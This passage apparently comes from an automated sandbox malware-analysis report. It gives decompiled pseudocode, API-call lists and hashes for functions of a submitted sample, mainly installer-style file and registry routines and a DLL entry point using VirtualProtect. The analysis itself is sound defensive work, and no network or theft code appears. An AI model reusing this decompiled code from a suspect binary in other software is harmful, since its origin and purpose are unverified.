                                                  				intOrPtr _t72;
                                                  				signed int _t77;
                                                  				intOrPtr _t79;
                                                  				intOrPtr _t80;
                                                  				void* _t81;
                                                  				void* _t87;
                                                  				void* _t88;
                                                  				void* _t89;
                                                  				void* _t90;
                                                  				intOrPtr _t93;
                                                  				intOrPtr _t94;
                                                  
                                                  				if( *0x71085050 != 0 && E71082ADB(_a4) == 0) {
                                                  					 *0x71085054 = _t93;
                                                  					if( *0x7108504c != 0) {
                                                  						_t93 =  *0x7108504c;
                                                  					} else {
                                                  						E710830C0(E71082AD5(), __ecx);
                                                  						 *0x7108504c = _t93;
                                                  					}
                                                  				}
                                                  				_t28 = E71082B09(_a4);
                                                  				_t94 = _t93 + 4;
                                                  				if(_t28 <= 0) {
                                                  					L9:
                                                  					_t29 = E71082AFD();
                                                  					_t72 = _a4;
                                                  					_t79 =  *0x71085058;
                                                  					 *((intOrPtr*)(_t29 + _t72)) = _t79;
                                                  					 *0x71085058 = _t72;
                                                  					E71082AF7();
                                                  					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
                                                  					 *0x71085034 = _t33;
                                                  					 *0x71085038 = _t79;
                                                  					if( *0x71085050 != 0 && E71082ADB( *0x71085058) == 0) {
                                                  						 *0x7108504c = _t94;
                                                  						_t94 =  *0x71085054;
                                                  					}
                                                  					_t80 =  *0x71085058;
                                                  					_a4 = _t80;
                                                  					 *0x71085058 =  *((intOrPtr*)(E71082AFD() + _t80));
                                                  					_t37 = E71082AE9(_t80);
                                                  					_pop(_t81);
                                                  					if(_t37 != 0) {
                                                  						_t40 = E71082B09(_t81);
                                                  						if(_t40 > 0) {
                                                  							_push(_t40);
                                                  							_push(E71082B14() + _a4 + _v8);
                                                  							_push(E71082B1E());
                                                  							if( *0x71085050 <= 0 || E71082ADB(_a4) != 0) {
                                                  								_pop(_t88);
                                                  								_pop(_t45);
                                                  								__eflags =  *((intOrPtr*)(_t88 + _t45)) - 2;
                                                  								if(__eflags == 0) {
                                                  								}
                                                  								asm("loop 0xfffffff5");
                                                  							} else {
                                                  								_pop(_t89);
                                                  								_pop(_t49);
                                                  								 *0x7108504c =  *0x7108504c +  *(_t89 + _t49) * 4;
                                                  								asm("loop 0xffffffeb");
                                                  							}
                                                  						}
                                                  					}
                                                  					_t107 =  *0x71085058;
                                                  					if( *0x71085058 == 0) {
                                                  						 *0x7108504c = 0;
                                                  					}
                                                  					E71082B42(_t107, _a4,  *0x71085034,  *0x71085038);
                                                  					return _a4;
                                                  				}
                                                  				_push(E71082B14() + _a4);
                                                  				_t56 = E71082B1A();
                                                  				_v8 = _t56;
                                                  				_t77 = _t28;
                                                  				_push(_t68 + _t56 * _t77);
                                                  				_t70 = E71082B26();
                                                  				_t87 = E71082B22();
                                                  				_t90 = E71082B1E();
                                                  				_t61 = _t77;
                                                  				if( *((intOrPtr*)(_t90 + _t61)) == 2) {
                                                  					_push( *((intOrPtr*)(_t70 + _t61)));
                                                  				}
                                                  				_push( *((intOrPtr*)(_t87 + _t61)));
                                                  				asm("loop 0xfffffff1");
                                                  				goto L9;
                                                  			}

























                                                  0x71082ba8
                                                  0x71082bb9
                                                  0x71082bc6
                                                  0x71082bda
                                                  0x71082bc8
                                                  0x71082bcd
                                                  0x71082bd2
                                                  0x71082bd2
                                                  0x71082bc6
                                                  0x71082be3
                                                  0x71082be8
                                                  0x71082bee
                                                  0x71082c32
                                                  0x71082c32
                                                  0x71082c37
                                                  0x71082c3c
                                                  0x71082c42
                                                  0x71082c44
                                                  0x71082c4a
                                                  0x71082c57
                                                  0x71082c59
                                                  0x71082c5e
                                                  0x71082c6b
                                                  0x71082c7e
                                                  0x71082c84
                                                  0x71082c8a
                                                  0x71082c8b
                                                  0x71082c91
                                                  0x71082c9d
                                                  0x71082ca3
                                                  0x71082cab
                                                  0x71082cac
                                                  0x71082caf
                                                  0x71082cba
                                                  0x71082cbc
                                                  0x71082cc8
                                                  0x71082cce
                                                  0x71082cd6
                                                  0x71082d02
                                                  0x71082d03
                                                  0x71082d05
                                                  0x71082d09
                                                  0x71082d09
                                                  0x71082d10
                                                  0x71082ce6
                                                  0x71082ce6
                                                  0x71082ce7
                                                  0x71082cf5
                                                  0x71082cfe
                                                  0x71082cfe
                                                  0x71082cd6
                                                  0x71082cba
                                                  0x71082d12
                                                  0x71082d19
                                                  0x71082d1b
                                                  0x71082d1b
                                                  0x71082d34
                                                  0x71082d42
                                                  0x71082d42
                                                  0x71082bf9
                                                  0x71082bfa
                                                  0x71082bff
                                                  0x71082c03
                                                  0x71082c08
                                                  0x71082c1c
                                                  0x71082c1d
                                                  0x71082c1e
                                                  0x71082c20
                                                  0x71082c25
                                                  0x71082c27
                                                  0x71082c27
                                                  0x71082c2a
                                                  0x71082c30
                                                  0x00000000

                                                  APIs
                                                  • CreateFileA.KERNELBASE(00000000), ref: 71082C57
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: 1fe8d65a0ed9ecd30764cc414d31dcbf07d28906f033d5b4e95625d0b67eb26e
                                                  • Instruction ID: d956e4862209ef4bf8bdd4f1119ce614f3c8922c498007564ced74b7c6b6f822
                                                  • Opcode Fuzzy Hash: 1fe8d65a0ed9ecd30764cc414d31dcbf07d28906f033d5b4e95625d0b67eb26e
                                                  • Instruction Fuzzy Hash: D441D07250C205DFDB12DFB5D980B9D7BB5EB04B14F308466F901DA200E73A9482DF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 33%
                                                  			E00402891(intOrPtr __edx, void* __eflags) {
                                                  				long _t8;
                                                  				long _t10;
                                                  				LONG* _t12;
                                                  				void* _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t16;
                                                  				void* _t19;
                                                  
                                                  				_t15 = __edx;
                                                  				_pop(ds);
                                                  				if(__eflags != 0) {
                                                  					_t8 = E00402D84(2);
                                                  					_pop(_t14);
                                                  					 *((intOrPtr*)(_t19 - 0x10)) = _t15;
                                                  					_t10 = SetFilePointer(E0040649D(_t14, _t16), _t8, _t12,  *(_t19 - 0x24)); // executed
                                                  					if( *((intOrPtr*)(_t19 - 0x2c)) >= _t12) {
                                                  						_push(_t10);
                                                  						_push( *((intOrPtr*)(_t19 - 0xc)));
                                                  						E00406484();
                                                  					}
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t19 - 4));
                                                  				return 0;
                                                  			}










                                                  0x00402891
                                                  0x00402891
                                                  0x00402892
                                                  0x0040289a
                                                  0x0040289f
                                                  0x004028a0
                                                  0x004028af
                                                  0x004028b8
                                                  0x004028be
                                                  0x00402ba1
                                                  0x00402ba4
                                                  0x00402ba4
                                                  0x004028b8
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 004028AF
                                                    • Part of subcall function 00406484: wsprintfW.USER32 ref: 00406491
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                  • Instruction ID: a13d1cf18dcce6f7d85bed0b4e0fde0de6b16079219dfacd376ffc086bc6f252
                                                  • Opcode Fuzzy Hash: 1a69bed114d0c3cb27e295a60469d00fb85b85c1c8bbaab52ea3f411131a6a45
                                                  • Instruction Fuzzy Hash: D3E09271A04105BFDB01EFA5AE499AEB3B8EF44319B10483BF102F00C1DA794D119B2D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004023B2(int __eax, WCHAR* __ebx) {
                                                  				WCHAR* _t11;
                                                  				WCHAR* _t13;
                                                  				void* _t17;
                                                  				int _t21;
                                                  
                                                  				_t11 = __ebx;
                                                  				_t5 = __eax;
                                                  				_t13 = 0;
                                                  				if(__eax != __ebx) {
                                                  					__eax = E00402DA6(__ebx);
                                                  				}
                                                  				if( *((intOrPtr*)(_t17 - 0x2c)) != _t11) {
                                                  					_t13 = E00402DA6(0x11);
                                                  				}
                                                  				if( *((intOrPtr*)(_t17 - 0x20)) != _t11) {
                                                  					_t11 = E00402DA6(0x22);
                                                  				}
                                                  				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402DA6(0xffffffcd)); // executed
                                                  				_t21 = _t5;
                                                  				if(_t21 == 0) {
                                                  					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t17 - 4));
                                                  				return 0;
                                                  			}







                                                  0x004023b2
                                                  0x004023b2
                                                  0x004023b4
                                                  0x004023b8
                                                  0x004023bb
                                                  0x004023c0
                                                  0x004023c5
                                                  0x004023ce
                                                  0x004023ce
                                                  0x004023d3
                                                  0x004023dc
                                                  0x004023dc
                                                  0x004023e9
                                                  0x004015b4
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004023E9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                  • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                  • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                  • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004063D8(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                  				void* _t7;
                                                  				long _t8;
                                                  				void* _t9;
                                                  
                                                  				_t7 = E00406329(_a4,  &_a12);
                                                  				if(_t7 != 0) {
                                                  					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                  					return _t8;
                                                  				}
                                                  				_t9 = 6;
                                                  				return _t9;
                                                  			}






                                                  0x004063e2
                                                  0x004063eb
                                                  0x00406401
                                                  0x00000000
                                                  0x00406401
                                                  0x004063ef
                                                  0x00000000

                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 00406401
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                  • Instruction ID: ccab944935cfefb85f0e849ce69279fb55db75a3b7fb0960311cd9d36817041a
                                                  • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                  • Instruction Fuzzy Hash: 04E0E6B2010109BFEF095F90DC0AD7B3B1DE704300F01892EFD06D4091E6B5AD306675
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004060DF(void* _a4, void* _a8, long _a12) {
                                                  				int _t7;
                                                  				long _t11;
                                                  
                                                  				_t11 = _a12;
                                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}





                                                  0x004060e3
                                                  0x004060f3
                                                  0x004060fb
                                                  0x00000000
                                                  0x00406102
                                                  0x00000000
                                                  0x00406104

                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403498,00000000,0041EA20,000000FF,0041EA20,000000FF,000000FF,00000004,00000000), ref: 004060F3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction ID: d8d859634201a592f38c73999a999f352708a9e59580de02994c407fa40ca669
                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                  • Instruction Fuzzy Hash: FAE08C3220026AABEF109E60DC04AEB3B6CFB00360F014837FA16E7081E270E93087A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004060B0(void* _a4, void* _a8, long _a12) {
                                                  				int _t7;
                                                  				long _t11;
                                                  
                                                  				_t11 = _a12;
                                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                  					return 0;
                                                  				} else {
                                                  					return 1;
                                                  				}
                                                  			}





                                                  0x004060b4
                                                  0x004060c4
                                                  0x004060cc
                                                  0x00000000
                                                  0x004060d3
                                                  0x00000000
                                                  0x004060d5

                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034E2,00000000,00000000,00403306,000000FF,00000004,00000000,00000000,00000000), ref: 004060C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction ID: 1583d2e05e1cff28e3594e7db3f0db2d88eef65457287744bb544c492d9958e5
                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                  • Instruction Fuzzy Hash: AEE0EC322502AAABDF10AE65DC04AEB7B6CEB05361F018936FD16E6150E631E92197A4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  
                                                  				 *0x71085048 = _a4;
                                                  				if(_a8 == 1) {
                                                  					VirtualProtect(0x7108505c, 4, 0x40, 0x7108504c); // executed
                                                  					 *0x7108505c = 0xc2;
                                                  					 *0x7108504c = 0;
                                                  					 *0x71085054 = 0;
                                                  					 *0x71085068 = 0;
                                                  					 *0x71085058 = 0;
                                                  					 *0x71085050 = 0;
                                                  					 *0x71085060 = 0;
                                                  					 *0x7108505e = 0;
                                                  				}
                                                  				return 1;
                                                  			}



                                                  0x71082a88
                                                  0x71082a8d
                                                  0x71082a9d
                                                  0x71082aa5
                                                  0x71082aac
                                                  0x71082ab1
                                                  0x71082ab6
                                                  0x71082abb
                                                  0x71082ac0
                                                  0x71082ac5
                                                  0x71082aca
                                                  0x71082aca
                                                  0x71082ad2

                                                  APIs
                                                  • VirtualProtect.KERNELBASE(7108505C,00000004,00000040,7108504C), ref: 71082A9D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.970618355.0000000071081000.00000020.00000001.01000000.00000004.sdmp, Offset: 71080000, based on PE: true
                                                  • Associated: 00000000.00000002.970532047.0000000071080000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970731155.0000000071084000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.970830151.0000000071086000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_71080000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 3146a817416b7536a2c793949496acffebac1edca09ee588e2f653125374aba4
                                                  • Instruction ID: ae1e901d93a867047bb550458ccc221c057ed4fbec8cb78384f834c4a09ee4ac
                                                  • Opcode Fuzzy Hash: 3146a817416b7536a2c793949496acffebac1edca09ee588e2f653125374aba4
                                                  • Instruction Fuzzy Hash: A3F09BB2A0C380DEC351CF2A844470E3FF0BB18608B34456AF288EA280F3364046EF96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004063AA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                                  				void* _t7;
                                                  				long _t8;
                                                  				void* _t9;
                                                  
                                                  				_t7 = E00406329(_a4,  &_a12);
                                                  				if(_t7 != 0) {
                                                  					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                                  					return _t8;
                                                  				}
                                                  				_t9 = 6;
                                                  				return _t9;
                                                  			}






                                                  0x004063b4
                                                  0x004063bb
                                                  0x004063ce
                                                  0x00000000
                                                  0x004063ce
                                                  0x004063bf
                                                  0x00000000

                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406438,?,00000000,?,?,Call,?), ref: 004063CE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                  • Instruction ID: 4361357c0318622cec318f667d88df30c4c29b75262f7bca7234b06b46464da2
                                                  • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                  • Instruction Fuzzy Hash: 83D0123210020EBBDF115F91AD01FAB3B5DAB08310F014426FE06E40A1D775D530A764
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004015A3() {
                                                  				int _t5;
                                                  				void* _t11;
                                                  				int _t14;
                                                  
                                                  				_t5 = SetFileAttributesW(E00402DA6(0xfffffff0),  *(_t11 - 0x2c)); // executed
                                                  				_t14 = _t5;
                                                  				if(_t14 == 0) {
                                                  					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                  				}
                                                  				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t11 - 4));
                                                  				return 0;
                                                  			}






                                                  0x004015ae
                                                  0x004015b4
                                                  0x004015b6
                                                  0x0040292e
                                                  0x0040292e
                                                  0x00402c2d
                                                  0x00402c39

                                                  APIs
                                                  • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944106193.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944149006.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944177313.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                  Similarity
                                                  • API ID: AttributesFile
                                                  • String ID:
                                                  • API String ID: 3188754299-0
                                                  • Opcode ID: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
                                                  • Instruction ID: 33d43a8ddb5fee1851102b8e64c9f064c627007e01bf6cdc746e786b0f5045d9
                                                  • Opcode Fuzzy Hash: 47b2afe40cba55761507d4970926e301de26d93e6e1ecc914e53ec7ca2d4fe06
                                                  • Instruction Fuzzy Hash: 30D01772B08110DBDB11DBA8AA48B9D72A4AB50368B208537D111F61D0E6B8C945AA19
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004044E5(int _a4) {
                                                  				struct HWND__* _t2;
                                                  				long _t3;
                                                  
                                                  				_t2 =  *0x433ed8; // 0x1501a8
                                                  				if(_t2 != 0) {
                                                  					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                  					return _t3;
                                                  				}
                                                  				return _t2;
                                                  			}





                                                  0x004044e5
                                                  0x004044ec
                                                  0x004044f7
                                                  0x00000000
                                                  0x004044f7
                                                  0x004044fd

                                                  APIs
                                                  • SendMessageW.USER32(001501A8,00000000,00000000,00000000), ref: 004044F7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.943726621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.943674353.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943797629.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943839130.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.943873169.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944047963.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.944072511.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
